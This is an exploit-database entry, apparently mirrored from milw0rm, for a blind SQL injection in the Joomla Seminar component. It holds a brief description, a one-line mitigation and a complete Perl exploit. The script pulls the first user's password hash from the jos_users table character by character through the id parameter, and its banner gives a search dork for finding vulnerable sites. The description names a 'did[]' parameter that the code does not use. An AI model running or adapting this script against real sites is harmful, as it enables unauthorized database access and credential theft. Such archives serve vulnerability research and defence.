Joomla Component Seminar Blind SQL Injection Exploit

vendor:

Joomla Component Seminar

by:

ThE g0bL!N

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Joomla Component Seminar

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component Seminar Blind SQL Injection Exploit

This exploit is related to a Blind SQL Injection vulnerability in Joomla Component Seminar. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'did[]' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's database. This can be exploited to gain access to the application's database and compromise the application and its data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
  print "                                                                        \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o   Joomla Component Seminar Blind SQL Injection Exploit              o\n";
  print "  o   Author:ThE g0bL!N                                                 o\n";
  print "  o   More info:http://extensions.joomla.org/extensions/calendars-&-events/events-registration/8426/details o\n";
  print "  o   vendor:http://seminar.vollmar.ws/                                 o\n";
  print "  o   Dork :   inurl:com_seminar                                        o\n";
  print "  o   Usage:   perl bachir.pl host path <options>                       o\n";
  print "  o   Example: perl bachir.pl www.host.com /joomla/ -s 2                o\n";
  print "  o                                                                     o\n";
  print "  o   Options:                                                          o\n";
  print "  o     -s   valid Article id                                           o\n";
  print "  o   Note:                                                             o\n";
  print "  o You can Change the match string by any content of the correct query o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $sid     = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "s=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
  $userid = $options{"u"};
}
if($options{"s"})
{
  $sid = $options{"s"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $sid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $sid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}
print "\n[~] Exploiting done\n";
sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $sid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_seminar&task=View_seminar&id=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")";
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "seminar_boxA";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2009-06-03]